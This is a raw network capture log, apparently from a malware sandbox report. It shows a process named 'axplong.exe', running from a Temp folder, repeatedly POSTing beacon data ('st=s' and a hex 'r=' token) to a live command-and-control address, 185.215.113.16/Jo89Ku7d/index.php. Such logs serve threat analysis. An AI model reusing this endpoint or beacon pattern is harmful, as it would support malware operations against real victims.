Sep 26, 2024 18:29:28.857063055 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:29.083080053 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	49744	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:29.261415958 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:29.961617947 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:29.963866949 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:30.191232920 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	49746	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:30.299949884 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:31.020965099 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:31.021889925 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:31.246807098 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	49747	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:31.363454103 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:32.052800894 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:32.053829908 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:32.276709080 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	49748	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:32.394277096 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:33.131731033 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:33.132818937 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:33.369824886 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	49749	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:33.487636089 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:34.185514927 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:34.603547096 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:34.830221891 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	49750	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:34.941252947 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:35.641802073 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:35.642966986 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:35.866833925 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	49751	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:36.258687019 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:37.126147985 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:37.132106066 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:37.368777990 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	49752	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:37.487869978 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:38.355880976 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:38.359211922 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:38.586429119 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	49753	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:38.706530094 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:39.415940046 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:39.416851997 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:39.646142960 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	49754	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:39.753189087 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:40.447009087 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:40.447995901 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:40.870287895 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	49755	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:41.217859030 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:41.919539928 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:41.950927019 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:42.178738117 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	49756	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:43.281311989 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:44.007570982 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:44.008317947 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
